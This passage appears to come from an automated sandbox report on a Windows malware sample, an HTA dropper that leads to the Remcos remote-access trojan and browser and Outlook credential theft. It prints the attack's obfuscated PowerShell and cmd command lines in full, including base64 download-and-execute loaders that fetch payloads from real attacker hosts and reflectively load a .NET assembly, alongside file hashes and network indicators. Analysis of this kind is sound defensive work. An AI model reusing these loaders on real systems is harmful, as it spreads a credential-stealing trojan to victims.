〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷QQBz⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷dgBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷H0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤏ ꒼ ⛲ ⫰ 〷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NNJ/001/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

Network

Country Destination Domain Proto
TR 45.90.89.50:80 45.90.89.50 tcp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp

Files

\??\c:\Users\Admin\AppData\Local\Temp\r6hwciqb.cmdline

MD5 f2ee48ea17cba7f4ce71b30a17aa580c
SHA1 5420ac0e6b7bd7f8e2df26f703e6b5bddbe03758
SHA256 a3cd6544f8dde33cc84b6223982fd9d9478e260aaf16fc1ab121ef5c6395c5f0
SHA512 8249bc621680309541530b38547dc05f02e42d809fbbbf96e568918190356ee13d14c82adf738142d22bad3aa3b636d66aee4c7cd6229b4e8fff0441776b3883

\??\c:\Users\Admin\AppData\Local\Temp\r6hwciqb.0.cs

MD5 c8323e21fb3e0a43c3296686b3399df5
SHA1 6acf09f8b65000472a3011fa65600dbe223ce44e
SHA256 82cde5c0e8c3ebd12df77f91b0c4fb50c5b9448078a890907be15146d58a4922
SHA512 6c25e0c9ba56534963d10969fe65a7dd74c2e5f3f848c197e6b71699b71086f6920124e83a23e3f43894330c7a1feef2d7b39fe576eaf465e7ee78277083dd91

C:\Users\Admin\AppData\Local\Temp\RESE86D.tmp

MD5 f24d8bdc7f7ac47860b3e0b6d57735be
SHA1 e5cfdbb542462cb5de8be6ff7fc5b97b58815108
SHA256 8e14275f127b259af8ac782a993b85a1eff4f09beb0f8d588a83aa127c905686
SHA512 6d723d8399f634a4843e4e2e75dcd86a83657734224b51c4a7b7758d62b7c44d2cd947c48aea13dc66ce10c5a82f211185e448c344780c7617a05243050fe70a

\??\c:\Users\Admin\AppData\Local\Temp\CSCE86C.tmp

MD5 4c48a753034a1d0838e00a776df9f7ea
SHA1 0ec8cd9b7b67a3efa17903b46f1dda73c70dde96
SHA256 295be2ed4bac5095f0b6bb803e3a45a84e1305deeda36e37dc40fa643605012b
SHA512 41e6d1b0c5717c17422a6e465bed6e73c56e1b72b6c394d75f555681d86764377127870db7d92ccd1939de1a1a46781c7eb6224ff39d8f377bd6a0bd1038ad7b

C:\Users\Admin\AppData\Local\Temp\r6hwciqb.dll

MD5 56cb057204652bc1dbeb96f721a14ca2
SHA1 02e41fb196b89dbe445201b24bdcf243b5fd2d06
SHA256 e61ddc2b3bfbb54ed29c59a123fb13130c92eaec2b2ad2c395ba1b3776ca911a
SHA512 78a1bc19ee32883132b60cc3481dd4baa9003fd82c5c66c25d81b61f349e9eb099012471fc1ad1b00e1d1b759fa0f584a7f08ad804d35880cbdf695bd3fd17ac

C:\Users\Admin\AppData\Local\Temp\r6hwciqb.pdb

MD5 30bcc320e8113a560c3e9fe19aae5d3e
SHA1 edfe06957c2a55902c074f6f14ff2ab066247930
SHA256 5971fc811ad532befd98f5d40bf423b0499d0c2c4968097bd1ee5da73ccc4871
SHA512 004e8995f8b12bf9fdb641e03d454f484b61faaaf0b71f5a893dae179c4a534f1e85aeb19dccceb2b12617d6f698e34dd7e7b73c46754d8c3536a856b07afd3e

C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS

MD5 ccde7ef0e90a5a62394fafe77c7eff7e
SHA1 197cbc0c7ab873fd02bf2b8a3a17d7b0f44bb003
SHA256 cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722
SHA512 047baeb2e3d183605346025f86df3042f596bd2505adf7597ffb2fd972acf9db6bd62d03a3f9b52c9a9ffabca743d5e3c359a5a12fc79a3d6e93fdc8d7930dfe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 8b32617551c6ee88ba78adf8692ecf4f
SHA1 e03fe8debc000d65014c5c99957f6ccedc7d160d
SHA256 7e1b576302eb4bfc049db9631c4f6c568c593c91aaefdc8580f5e9ecc0277d01
SHA512 22ed5ec3df9ac67fcc6559516934e8e2e3ee41a4159e8757eefd4b587c954d4fa88afbf55028c3f8840bd499954f2aabc82742d94b3b154480b4e0677b37508c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DSOYRZVZKFQETVV1HY1N.temp

MD5 5269922377d515fee720d362246aeee3
SHA1 20f9fb3c30384b3faa69a0ef0517d04f28b62156
SHA256 5efcef8acaecd2c40eeeee359b631d858615b1eb82711fc8bf84f09290b995af
SHA512 4c2896541e8aefbac5aebf4c126cd2621022f8d18515b518f7bb8b5ef3b372ee972e336318aeab90f22a8c31730449d8ddf50dadf137e9bd9790fdef91e3d510

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 08:57

Reported

2024-08-06 08:59

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

143s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INET.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Remcos

rat remcos

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3660 wrote to memory of 3708 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3660 wrote to memory of 3708 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3660 wrote to memory of 3708 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3708 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 5032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5032 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5032 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 5032 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4716 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4716 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4716 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5032 wrote to memory of 4320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 5032 wrote to memory of 4320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 5032 wrote to memory of 4320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 4320 wrote to memory of 4512 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4320 wrote to memory of 4512 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4320 wrote to memory of 4512 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4512 wrote to memory of 4680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4512 wrote to memory of 4680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4512 wrote to memory of 4680 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4680 wrote to memory of 3940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 5004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 5004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 5004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 5004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 2276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 2276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 2276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3940 wrote to memory of 2276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INET.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nexa5qo0\nexa5qo0.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCCF5.tmp" "c:\Users\Admin\AppData\Local\Temp\nexa5qo0\CSC132CAD0FEE943D6AA74BDCD267E512.TMP"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷LwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cgB2⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷dwBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bu⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷LgBj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷cg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YgBz⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷agBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷ZQBi⤏ ꒼ ⛲ 